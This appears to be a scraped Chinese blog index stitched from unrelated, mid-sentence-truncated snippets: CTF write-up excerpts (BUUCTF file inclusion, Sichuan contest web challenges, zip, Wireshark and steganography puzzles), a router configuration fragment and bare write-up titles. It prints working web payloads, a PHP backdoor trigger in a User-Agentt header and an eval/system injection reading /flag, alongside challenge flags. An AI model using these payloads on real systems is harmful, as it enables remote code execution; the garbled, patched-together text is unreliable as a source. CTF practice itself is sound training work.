BUUCTF：[BSidesCF 2020]Had a bad day可能存在SQL注入或者文件包含，在我尝试读取index.php源码的时候出现了报错信息的确是文件包含，但是有index.php却读取错误，报错显示无法打开流：操作失败在后面测试的时候，发现除掉后缀即可读取到源码base64解码读取源码<?php$file = $_GET['category'];...

首先把基本的路由器接口地址按照上图配置好Trust: R1:syssysname R1int e0/0/0ip address 192.168.1.2 24DMZ: R2:syssysname R2int e0/0/0ip address 172.16.1.2 24Untrust: R3:syssysname R3int e0/0/0ip address 202.1.1.2 24进入防火墙把接口地

2023年四川省网络与信息安全技能大赛初赛 个人赛 Writeup

文章目录Web签到unsetme“慢慢做”管理系统Misc你会日志分析吗sectrafficWeb签到http://cn-sec.com/archives/313267.htmlUser-Agentt: zerodiumsystem("cat /flag");unsetme这题先放着/?a=:[]);eval($_GET[1]);//&1=system(%27cat%20/flag%27)

2024年四川省第二届网信行业技能竞赛-数据安全赛项决赛Writeup

2025数字中国创新大赛-数字安全赛道数据安全产业积分争夺赛决赛Writeup

https://buuoj.cn/challenges#[MRCTF2020]%E5%8D%83%E5%B1%82%E5%A5%97%E8%B7%AF套娃题，拿脚本解压import zipfilename = '0573'while True:fz = zipfile.ZipFile(name + '.zip', 'r')fz.extractall(pwd=bytes(name, 'utf-8')

题目地址：https://buuoj.cn/challenges#wireshark根据提示直接过滤出POST包http.request.method==POSTflag{ffb7567a1d4f4abdffdb54e022f8facd}

题目地址：https://buuoj.cn/challenges#%E6%95%B0%E6%8D%AE%E5%8C%85%E4%B8%AD%E7%9A%84%E7%BA%BF%E7%B4%A2大部分都是TCP的包，直接过滤http的包追踪http流传输内容好像是base64密文，使用这个网站解码base64：https://the-x.cn/base64发现解码出来的内容是jpg图片格式并以自动转

题目地址：https://buuoj.cn/challenges#%E9%95%9C%E5%AD%90%E9%87%8C%E9%9D%A2%E7%9A%84%E4%B8%96%E7%95%8C根据图片名提示使用stegsolve打开在Analyse->Data Extract中调整，得到flagflag{st3g0_saurus_wr3cks}